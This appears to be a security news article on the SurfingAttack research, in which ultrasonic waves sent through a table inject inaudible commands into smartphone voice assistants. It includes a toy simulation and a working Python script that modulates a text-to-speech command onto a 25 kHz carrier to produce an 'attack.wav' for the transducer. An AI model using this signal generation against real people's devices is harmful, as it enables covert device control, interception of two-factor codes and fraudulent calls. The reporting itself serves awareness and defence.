Hackers Can Use Ultrasonic Waves to Secretly Control Voice Assistant Devices


Researchers have discovered a new means to target
voice-controlled devices by propagating ultrasonic waves through
solid materials in order to interact with and compromise them using
inaudible voice commands without the victims’ knowledge.

Called “SurfingAttack[1],” the attack leverages
the unique properties of acoustic transmission in solid materials —
such as tables — to “enable multiple rounds of interactions between
the voice-controlled device and the attacker over a longer distance
and without the need to be in line-of-sight.”

In doing so, the researchers outlined in the paper, it’s possible
for an attacker to interact with the devices through their voice
assistants, hijack SMS two-factor authentication codes, and even
place fraudulent calls, thereby controlling the victim’s device
inconspicuously.

The research was published by a group of academics from Michigan
State University, Washington University in St. Louis, Chinese
Academy of Sciences, and the University of
Nebraska-Lincoln.

The results were presented at the Network and Distributed System
Security Symposium (NDSS) on February 24 in San Diego.

How Does SurfingAttack Work?

MEMS microphones[2], which are standard in most voice-assistant
controlled devices, contain a small, built-in plate called the
diaphragm. When sound or light waves hit the diaphragm, its movement
is translated into an electrical signal that is then decoded into
the actual commands.
The novel attack exploits the nonlinear nature[3] of MEMS microphone
circuits to transmit malicious ultrasonic signals[4] (high-frequency
sound waves that are inaudible to the human ear) using a $5
piezoelectric transducer attached to the table surface. What’s more,
the attacks can be executed from as far as 30 feet away.
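
To see why this nonlinearity matters, consider a toy model in which
the microphone circuit responds as y = x + a·x² to an incoming
pressure wave x. The quadratic term of an amplitude-modulated
ultrasonic carrier contains a baseband copy of the modulating voice
signal, which the device then processes as ordinary audio. The
Python sketch below illustrates the effect; the 25 kHz carrier and
the 1 kHz tone standing in for speech are illustrative values, not
numbers from the paper.

import numpy as np

# Toy model of inaudible command injection via microphone
# nonlinearity. All values are illustrative, not from the paper.
fs = 192_000                    # sample rate high enough for ultrasound
t = np.arange(0, 0.05, 1 / fs)  # 50 ms of signal

f_carrier = 25_000              # ultrasonic carrier, above human hearing
f_voice = 1_000                 # stand-in for a voice command

# The attacker transmits an amplitude-modulated ultrasonic wave,
# which is inaudible on its own.
voice = np.sin(2 * np.pi * f_voice * t)
transmitted = (1 + voice) * np.sin(2 * np.pi * f_carrier * t)

# Idealized microphone with a small quadratic nonlinearity:
# y = x + a * x**2. The squared term demodulates the AM signal,
# leaving a component at f_voice in the audible band.
a = 0.1
received = transmitted + a * transmitted ** 2

# The strongest non-DC component below 20 kHz is the recovered tone.
spectrum = np.abs(np.fft.rfft(received))
freqs = np.fft.rfftfreq(len(received), 1 / fs)
audible = freqs < 20_000
idx = np.argmax(spectrum[audible][1:]) + 1
print(f"strongest audible component: {freqs[audible][idx]:.0f} Hz")  # ~1000

An ideal linear microphone (a = 0) would register no audible energy
at all; it is the quadratic term that turns the inaudible carrier
into a command the device can hear.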

To conceal the attack from the victim, the researchers also issued a
guided ultrasonic wave to turn the device’s volume down low enough
that the voice responses went unnoticed, while still recording those
responses via a hidden tapping device placed underneath the table,
close to the victim’s device.

Once set up, an interloper can not only activate the voice
assistants (e.g., using “OK Google” or “Hey Siri” as wake words),
but also generate attack commands (e.g., “read my messages,” or
“call Sam with speakerphone”) using text-to-speech (TTS) systems —
all of which are transmitted in the form of ultrasonic guided wave
signals that can propagate along the table to control the
devices.
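
On the attacker’s side, the signal preparation can be pictured as
classic amplitude modulation of the TTS output onto an ultrasonic
carrier before it is fed to the transducer. The sketch below is a
simplified, hypothetical version of that step; the file names, the
25 kHz carrier, and the modulation depth are assumptions made for
illustration, not the paper’s actual tooling.

import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000  # above the ~20 kHz limit of human hearing
DEPTH = 0.8          # modulation depth (0 to 1)

# "command.wav" stands in for TTS output such as "read my messages".
rate, command = wavfile.read("command.wav")
if command.ndim > 1:
    command = command.mean(axis=1)    # mix down to mono
command = command.astype(np.float64)
command /= np.max(np.abs(command))    # normalize to [-1, 1]

# The recording's sample rate must be high enough to represent the
# ultrasonic carrier; resample the command first if it is not.
assert rate >= 2 * CARRIER_HZ, "resample the command to a higher rate"

t = np.arange(len(command)) / rate
carrier = np.sin(2 * np.pi * CARRIER_HZ * t)
attack = (1 + DEPTH * command) * carrier  # classic AM, inaudible in air

# Save as 16-bit PCM; in the physical attack, this waveform would
# drive the piezoelectric transducer attached beneath the table.
pcm = np.int16(attack / np.max(np.abs(attack)) * 32767)
wavfile.write("attack.wav", rate, pcm)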

SurfingAttack was tested against a variety of voice assistant
devices, including the Google Pixel, Apple iPhone, Samsung Galaxy
S9, and Xiaomi Mi 8, all of which were found to be vulnerable to
ultrasonic wave attacks. The attack also worked across different
table surfaces (e.g., metal, glass, wood) and phone configurations.

The experiments, however, turned up two failure cases, the Huawei
Mate 9 and the Samsung Galaxy Note 10+, the former of which became
vulnerable once LineageOS was installed. Observing that the recorded
sounds of the ultrasound commands from the Galaxy Note 10+ were very
weak, the researchers attributed the failure “to the structures and
materials of the phone body.”

In some consolation, smart speakers from Amazon and Google — the
Amazon Echo and Google Home — were not found to be impacted by this
attack.

Voice-based Attacks on the Rise

While there are no indications so far that SurfingAttack has been
maliciously exploited in the wild, this is not the first time
injection attacks of this kind have been uncovered.

Indeed, the research builds upon a recent string of studies —
BackDoor[5], LipRead[6], and DolphinAttack[7] — that show it’s
possible to exploit the nonlinearity in microphones[8] to deliver
inaudible commands to the system via ultrasound signals.

Furthermore, a study published late last year by researchers from
the Tokyo-based University of Electro-Communications and the
University of Michigan described a series of attacks — called Light
Commands[9] — that employed lasers to inject inaudible commands into
smartphones and speakers, and surreptitiously cause them to unlock
doors, shop on e-commerce websites, and even start vehicles.

While that attack required the laser beam to be in direct line of
sight of the target device, SurfingAttack’s unique propagation
capabilities eliminate this need, allowing a potential attacker to
remotely interact with a voice-activated device and execute
unauthorized commands to access sensitive information without the
victim’s knowledge.

If anything, the latest research presents a new attack vector that
will require device makers to erect new security defenses and
safeguard devices from voice-based attacks, which are increasingly
becoming an entry point into the smart home.


References

  1. SurfingAttack (surfingattack.github.io)
  2. MEMS microphones (www.edn.com)
  3. nonlinear nature (arxiv.org)
  4. malicious ultrasonic signals (surfingattack.github.io)
  5. BackDoor (synrg.csl.illinois.edu)
  6. LipRead (synrg.csl.illinois.edu)
  7. DolphinAttack (acmccs.github.io)
  8. microphones (arxiv.org)
  9. Light Commands (thehackernews.com)
